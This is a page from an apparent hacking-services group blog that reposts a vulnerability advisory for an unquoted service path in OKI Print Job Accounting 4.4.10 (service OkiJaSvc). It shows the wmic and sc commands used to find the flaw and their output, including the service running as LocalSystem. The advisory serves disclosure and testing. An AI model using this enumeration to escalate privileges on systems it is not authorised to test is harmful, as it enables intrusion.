Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86385524

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 07-03-2021
# Vendor Homepage: https://www.oki.com
# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
# Tested Version: 4.4.10
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 8.1 Pro 64 bits

C:\Windows\system32>wmic service get name, displayname, pathname, startmode
| findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ OKI
Local Port Manager OpLclSrv C:\Program
Files\Okidata\Common\Extend3\portmgrsrv.exe Print Job Accounting OkiJaSvc
C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe Print Job
Accounting Watch Service OkiWchSvc C:\Program Files\Okidata\Print Job
Accounting\okwchsvc.exe Print Job Accounting opja0004 opja0004 C:\Program
Files\Okidata\Print Job Accounting\opja0004.exe

C:\Windows\system32>sc qc OkiJaSvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: OkiJaSvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Print Job Accounting
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem